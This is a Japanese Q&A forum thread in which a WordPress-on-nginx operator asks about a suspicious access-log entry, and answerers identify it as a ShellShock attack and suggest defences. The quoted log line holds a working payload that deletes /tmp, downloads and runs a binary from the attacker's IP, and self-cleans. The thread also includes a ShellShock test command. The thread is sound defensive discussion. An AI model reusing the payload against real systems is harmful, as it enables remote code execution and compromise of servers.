質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.48%
nginx

nginixは軽量で高性能なwebサーバーの1つです。BSD-likeライセンスのもとリリースされており、あわせてHTTPサーバ、リバースプロキシ、メールプロキシの機能も備えています。MacOSX、Windows、Linux、上で動作します。

Webサーバー

Webサーバーとは、HTTPリクエストに応じて、クライアントに情報を提供するシステムです。

WordPress

WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

Q&A

解決済

3回答

2420閲覧

nginxで動作しているWordPressサイトのアクセスログに不審なログがある。

teketeke

総合スコア46

nginx

nginixは軽量で高性能なwebサーバーの1つです。BSD-likeライセンスのもとリリースされており、あわせてHTTPサーバ、リバースプロキシ、メールプロキシの機能も備えています。MacOSX、Windows、Linux、上で動作します。

Webサーバー

Webサーバーとは、HTTPリクエストに応じて、クライアントに情報を提供するシステムです。

WordPress

WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

0グッド

0クリップ

投稿2015/04/03 07:17

【環境】
=====
AWS EC2
nginx/1.6.2
PHP 5.3.29
WordPress 4.1.1
=====

現在、AWS上にてWordPressのブログサイトを利用しています。

昨日、アクセスログを確認したところ、以下のようなログがありました。
/bin/bashやechoコマンドといったものが書かれていたので、踏み台にされていたりしないか不安になり、質問させていただきました。

以下のログはどういったものになるのでしょうか。
もしお分かりになる方がいましたら、お教えいただけますでしょうか。

もし何かの攻撃だとしたら、どういったことを行おうとしているものなのでしょうか。

【ログ】

117.21.191.209 - - [01/Apr/2015:11:13:47 +0900] "GET / HTTP/1.1" 200 35509 "() { :; }; /bin/bash -c \x22rm -rf /tmp/;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

guest

回答3

0

いわゆる ShellShock 脆弱性を狙ったものです。リファラーとユーザーエージェントに攻撃用のコードが埋め込まれています。

投稿2015/04/03 08:01

ngyuki

総合スコア4514

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

teketeke

2015/04/03 08:56

ytgrsua4様の方へコメントさせていただきましたが、改めてコメントを書かせていただきます。 このサイトの使い方がいまいちわかっていないので、こういったコメントの書き方がまずかったら御指摘頂けると助かります。 現在の環境のbashはupdateもなかったので、ShellShock対応済みだと思ったのですが、何か対策はあるのでしょうか。 以下確認したことです。 ----- $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test ※メッセージが表示される ----- $ env var='() {(a)=>\' bash -c "echo date"; cat echo date cat: echo: No such file or directory ----- # bash --version GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu) Copyright (C) 2009 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software; you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. ----- # rpm -qa bash bash-4.1.2-15.24.amzn1.x86_64 -----
ngyuki

2015/04/03 12:29

別の回答のコメントにあるように、既に ShellShock の対応をされているのであればそんなに気にする必要はないと思います(どうせいろんなところからその種のアクセスは来るものなので)。
teketeke

2015/04/06 12:33

コメントありがとうございます。 >どうせいろんなところからその種のアクセスは来るものなので 確かに中国、韓国とかからへんなアクセスがなくならないんですよね。 今回のShellShockの件については、あまり気にしないようにいたします。 ※引き続きアクセス制限は定期的にやっていくつもりです。
guest

0

ベストアンサー

はじめまして。
ザックリまとめると

117.21.191.209:9645から不正なプログラムをダウンロードする命令をRun.shに書き込む
それらを実行する命令をRun.shに書き込む
最後にRun.shも削除する様にRun.shに書き込む
Run.shの権限を777にする
Run.shを実行する

といった流れかと思います。
念のため/tmp/China.Z-jztp8が無いか/tmp/Run.shが無いか確認しておくとよいかと思います。

※一部修正しました

投稿2015/04/03 08:00

編集2015/04/03 08:55
toaruhetare

総合スコア141

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

teketeke

2015/04/03 08:37

確認したところ、/tmp/China.Z-jztp8と/tmp/Run.shが無いことを確認しました。 ちなみに、現在の環境のbashはupdateもなかったので、ShellShock対応済みだと思ったのですが、何か対策はあるのでしょうか。 以下確認したことです。 ----- $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test ※メッセージが表示される ----- $ env var='() {(a)=>\' bash -c "echo date"; cat echo date cat: echo: No such file or directory ----- # bash --version GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu) Copyright (C) 2009 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software; you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. ----- # rpm -qa bash bash-4.1.2-15.24.amzn1.x86_64 -----
toaruhetare

2015/04/03 09:07

Amazon Linuxの修正版bashはbash-4.1.2-15.21.amzn1だそうなので、そのバージョンであれば対応済みだと思われます。 ShellShockに対応しているのであればあまり気を張る必要はないかと思いますが、少なくとも攻撃を行ってきたIPからのアクセスは拒否するのがいいかと思います。 また今回の件と直接関係ないですが、PHP5.3はサポートが終了しているので出来うる限りサポートされているバージョンに切り替える方ことをおすすめします。
teketeke

2015/04/03 11:49

>ShellShockに対応しているのであればあまり気を張る必要はないかと思いますが、少なくとも攻撃を行ってきたIPからのアクセスは拒否するのがいいかと思います。 そうですね。アクセス制限は行おうと思います。 PHPのバージョンについても、早めに切り替えたいと思います。
guest

0

まさしく攻撃ですね。外部のサイトから攻撃用スクリプトをダウンロードさせて実行させる。
つまり、あなたのWebサーバが、他のサーバを攻撃するための踏み台になってしまうわけです。
(攻撃が成功したかどうかは、これを見てもわかりませんが。)

投稿2015/04/03 07:40

chokojori

総合スコア971

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.48%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問